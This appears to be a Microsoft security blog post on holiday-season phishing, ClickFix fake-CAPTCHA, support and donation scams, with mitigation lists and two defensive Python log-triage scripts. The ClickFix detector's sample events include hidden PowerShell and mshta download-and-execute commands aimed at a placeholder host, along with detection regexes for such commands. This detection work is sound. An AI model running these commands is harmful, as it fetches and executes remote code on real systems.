Staying secure online during the holidays

What defenders need to know

Cybercriminals look for opportunities to take advantage of people, and the holiday season makes that easier because people are distracted. Between shopping, family time, the head colds making the rounds, and connecting with loved ones over the internet, it’s easy pickings for threat actors.

Unfortunately, that spike in legitimate activity creates cover for threat actors. Microsoft’s Threat Intelligence data shows attackers time campaigns to coincide with periods when people are distracted, rushed, and more trusting of emails from retailers or delivery services.

These seasonal patterns show up consistently in Microsoft’s telemetry and in the 2025 Microsoft Digital Defense Report (MDDR), which highlights how AI-enabled social engineering and impersonation attacks increase in both volume and success rate during high-transaction periods.

Here’s what defenders and everyday users should keep an eye on as the holidays approach.

Device-code phishing

During the holiday rush when order confirmations, shipping updates, identity checks, and fraud alerts genuinely spike, threat actors exploit the noise. They send messages prompting users to enter a “verification code” to fix a purchase issue or confirm a delivery. The pretext feels familiar and time-sensitive, which lowers suspicion. But entering that code can silently grant attackers OAuth access to the user’s account without ever requiring a password.

Microsoft Threat Intelligence has tracked a steady rise in these credential-less account takeover techniques across both consumer and enterprise environments. Attackers use device codes and consent-based phishing because they’re simple, scalable, and highly effective at bypassing traditional credential theft controls. During peak shopping periods, these lures blend seamlessly with legitimate communications, making detection harder and increasing the likelihood of compromise.

How to mitigate device-code phishing
  • Restrict device code flow wherever possible
  • Strengthen sign-in clarity and user verification
  • Revoke access immediately when suspicious activity is detected
  • Use sign-in risk policies to automate containment
  • Monitor Risky Sign-Ins continuously
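To make the last two bullets concrete, here is an added triage script (not Microsoft's code or tooling) that walks sign-in records and flags device-code authentications that break an expectation: an app that has no business using the flow, an unexpected country, or a non-zero sign-in risk. The field names, the constructed sample records and the allowlists are assumptions to be mapped onto your own Entra sign-in log export.

```python
import json

# Assumption: only the Azure CLI on headless admin hosts legitimately uses the
# device code flow; any other app using it deserves a look.
EXPECTED_DEVICE_CODE_APPS = {"Microsoft Azure CLI"}
# Assumption for the sample: the workforce normally signs in from the US.
EXPECTED_COUNTRIES = {"US"}

# Constructed sample records, loosely modelled on Entra sign-in log exports.
# Field names are an assumption; map them to your own export schema.
SAMPLE_SIGNINS = """
{"createdDateTime":"2025-11-25T14:02:11Z","userPrincipalName":"alice@example.com","authenticationProtocol":"oAuth2","ipAddress":"203.0.113.10","countryOrRegion":"US","appDisplayName":"Outlook","riskLevelDuringSignIn":"none"}
{"createdDateTime":"2025-11-25T14:05:40Z","userPrincipalName":"bob@example.com","authenticationProtocol":"deviceCode","ipAddress":"198.51.100.7","countryOrRegion":"NL","appDisplayName":"Microsoft Office","riskLevelDuringSignIn":"none"}
{"createdDateTime":"2025-11-25T14:06:02Z","userPrincipalName":"carol@example.com","authenticationProtocol":"deviceCode","ipAddress":"203.0.113.22","countryOrRegion":"US","appDisplayName":"Microsoft Azure CLI","riskLevelDuringSignIn":"none"}
{"createdDateTime":"2025-11-25T14:09:15Z","userPrincipalName":"dave@example.com","authenticationProtocol":"deviceCode","ipAddress":"192.0.2.55","countryOrRegion":"US","appDisplayName":"Microsoft Office","riskLevelDuringSignIn":"medium"}
"""


def parse_signins(text):
    """One JSON object per line, as most log exports deliver them."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def triage_device_code(records):
    """Return one finding per device-code sign-in that breaks an expectation."""
    findings = []
    for r in records:
        if r.get("authenticationProtocol") != "deviceCode":
            continue  # ordinary interactive sign-in; out of scope for this check
        reasons = []
        if r.get("appDisplayName") not in EXPECTED_DEVICE_CODE_APPS:
            reasons.append("device code used by unexpected app: %s" % r.get("appDisplayName"))
        if r.get("countryOrRegion") not in EXPECTED_COUNTRIES:
            reasons.append("sign-in from unexpected country: %s" % r.get("countryOrRegion"))
        if r.get("riskLevelDuringSignIn", "none") != "none":
            reasons.append("sign-in risk level: %s" % r.get("riskLevelDuringSignIn"))
        if reasons:
            findings.append({"user": r["userPrincipalName"], "time": r["createdDateTime"],
                             "ip": r["ipAddress"], "reasons": reasons,
                             "action": "revoke sessions and refresh tokens, then confirm with the user"})
    return findings


if __name__ == "__main__":
    for f in triage_device_code(parse_signins(SAMPLE_SIGNINS)):
        print(f["time"], f["user"], f["ip"], "; ".join(f["reasons"]))
```

In the sample, carol's Azure CLI sign-in passes while bob (foreign country, wrong app) and dave (wrong app, medium risk) are surfaced for containment.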

Fake CAPTCHA attacks (ClickFix schemes)

Holiday travel deals, flash sales, and last-minute gift hunting create ideal conditions for attackers to hide in plain sight. Redirect attacks that impersonate booking confirmations or promotional emails often lead victims to a CAPTCHA page, a pattern users trust and rarely question. But these aren’t real CAPTCHAs. Threat actors now use them as a delivery mechanism for social engineering instructions, prompting victims to paste malicious commands directly into Windows Run prompts or terminals.

Microsoft Threat Intelligence recently warned about the rapid growth of these ClickFix schemes. They require no exploit chain, just user action. This simplicity makes them highly scalable and particularly dangerous during seasonal peaks, when shoppers are moving quickly and are more likely to comply with seemingly routine prompts.

For example, just ahead of Thanksgiving, Microsoft Threat Intelligence detected and blocked a high-volume phishing campaign from Storm-0900 targeting tens of thousands of U.S. users. The actor timed its operation to land on a holiday when people were distracted and expecting urgent messages.

The emails used familiar lures like parking tickets, medical results, and Thanksgiving references. Each message redirected victims to an attacker-controlled site with a fake slider CAPTCHA, followed by a ClickFix prompt.

Microsoft disrupted the campaign through filtering, endpoint protection, and preemptive blocking of attacker infrastructure. However, the campaign is a clear example of how threat actors pair trusted UX patterns (like CAPTCHAs) with user-execution techniques to bypass traditional controls.

How to mitigate fake CAPTCHA and ClickFix attacks
  • Enforce application control and restrict command execution paths
  • Disable or tightly restrict unneeded command-line interfaces
  • Harden browser and URL filtering policies
  • Strengthen user heuristics around unexpected actions
  • Monitor for unusual command execution patterns
  • Maintain least-privilege account design
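One way to act on "monitor for unusual command execution patterns" for the ClickFix shape described above, as an added example that is not Microsoft's detection logic: score process-creation events where an interpreter is started from the Run dialog (parent explorer.exe) with a command line carrying download, encoded-command, hidden-window or remote-URL markers. The sample events, field names (modelled on Sysmon Event ID 1) and the scoring threshold are assumptions.

```python
import json
import ntpath
import re

# Constructed sample events modelled on Sysmon Event ID 1 (process creation);
# field names are an assumption and may differ in your pipeline.
SAMPLE_EVENTS = r"""
{"User":"CORP\\alice","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe"}
{"User":"CORP\\bob","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe"}
{"User":"CORP\\carol","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -c iex (iwr http://example.invalid/x)"}
{"User":"NT AUTHORITY\\SYSTEM","ParentImage":"C:\\Windows\\System32\\svchost.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"}
{"User":"CORP\\dave","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta https://example.invalid/c.hta"}
"""

# Interpreters a ClickFix lure typically tells the victim to paste a command into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# A command typed into the Run dialog is spawned by explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}

INDICATORS = [
    ("remote-url", re.compile(r"https?://", re.I)),
    ("encoded-command", re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)),
    ("download-and-execute", re.compile(r"\b(iex|invoke-expression|downloadstring|iwr|invoke-webrequest)\b", re.I)),
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
]


def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def score_event(ev):
    """Return (score, matched indicator names); (0, []) when the event is out of scope."""
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    child = ntpath.basename(ev.get("Image", "")).lower()
    if parent not in RUN_DIALOG_PARENTS or child not in INTERPRETERS:
        return 0, []  # scheduled tasks, services and non-interpreter children are ignored here
    hits = [name for name, rx in INDICATORS if rx.search(ev.get("CommandLine", ""))]
    score = len(hits)
    if child == "mshta.exe" and "remote-url" in hits:
        score += 1  # mshta fetching a remote .hta from the Run dialog is rarely legitimate
    return score, hits


def triage_clickfix(events, threshold=2):
    """Events at or above the threshold are worth an analyst's look; lower scores stay as context."""
    findings = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            findings.append({"user": ev["User"], "image": ev["Image"], "score": score, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in triage_clickfix(parse_events(SAMPLE_EVENTS)):
        print(f["score"], f["user"], f["image"], ", ".join(f["indicators"]))
```

A plain `powershell.exe` launched from the Run dialog scores zero, so the heuristic tolerates ordinary interactive use and reserves alerts for the paste-this-command shape.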

Tech support impersonation scams

People travel with less-secure personal devices, use hotel Wi-Fi, and run into more technical hiccups. Attackers exploit this by impersonating support staff offering to solve non-existent problems. These scams consistently surge from November through January, and they hit elderly family members and people who aren’t deeply technical especially hard.

The 2025 MDDR calls out support scams as one of the most successful global fraud categories; the same report finds that extortion and ransomware drive half of all cyberattacks.

Threat actors increasingly use AI-generated scripts, realistic phone personas, and brand impersonation to add credibility. The result is a convincing pretext that can lead to remote-access malware installation, credential theft, or full account takeover.

For defenders and executives, these scams are especially concerning because they blur personal and corporate risk: a compromised personal device on hotel Wi-Fi can quickly become a staging point for broader attacks.

Mitigating tech support impersonation scams
  • Reduce the attack surface with strict remote-access controls
  • Reinforce verification culture across the organization
  • Train users to distrust urgency and unsolicited offers of assistance
  • Harden devices used during travel
  • Block look-alike domains and impersonation sites
  • Monitor for remote-access tool abuse and unusual helpdesk patterns
  • Provide clear, rapid reporting channels

Fake shipping and delivery notifications

Holiday shopping turns everyone into a package-tracking machine, and threat actors insert themselves into that mental workflow. With many people juggling a dozen shipments, one more email claiming a delay or asking for an address confirmation doesn’t raise suspicion.

According to the Digital Defense Report, shipping-themed phishing is one of the most abused impersonation categories. Microsoft Threat Intelligence sees predictable spikes in these logistics-based lures each holiday season, with attackers impersonating well-known carriers such as UPS, USPS, FedEx, Amazon, DHL, and regional postal services. The branding is convincing, the timing is plausible, and the user expectations during peak shopping weeks make these attacks especially effective.

Because these campaigns mirror legitimate transaction flows and often incorporate real tracking numbers pulled from data leaks or scraped inboxes, they are increasingly difficult for users to distinguish from authentic notifications.

How to mitigate fake shipping and delivery notification scams
  • Enforce URL and domain protections that neutralize impersonation attempts
  • Harden user verification behaviors during peak shopping periods
  • Apply Conditional Access friction to financially sensitive actions
  • Add behavioral detection for mail rule creation and forwarding anomalies
  • Deploy impersonation protection and sender authentication policies

Charity and donation scams

Seasonal generosity spikes in Q4, especially during Giving Tuesday, and attackers exploit it. AI now enables threat actors to generate polished nonprofit websites, emotionally compelling stories, and persuasive donation forms at scale. They craft urgent, heart-tugging narratives about disaster relief, community drives, or last-chance holiday campaigns, hoping to combine goodwill with distraction and pressure.

Mitigating charity and donation scams
  • Reinforce verification culture — especially during giving seasons
  • Promote use of vetted donation platforms
  • Block and monitor look-alike or newly registered domains
  • Apply phishing-resistant identity controls and anomaly detection
  • Educate employees and stakeholders on scam shifts

Enjoy the season, but with eyes open

Security shouldn’t drain the joy from the season, but awareness matters more in moments of high activity and distraction. Microsoft’s guidance across the Be Cybersmart Kit aligns on this point: a pause, a verification step, or a second look is often the difference between staying safe and becoming a victim.
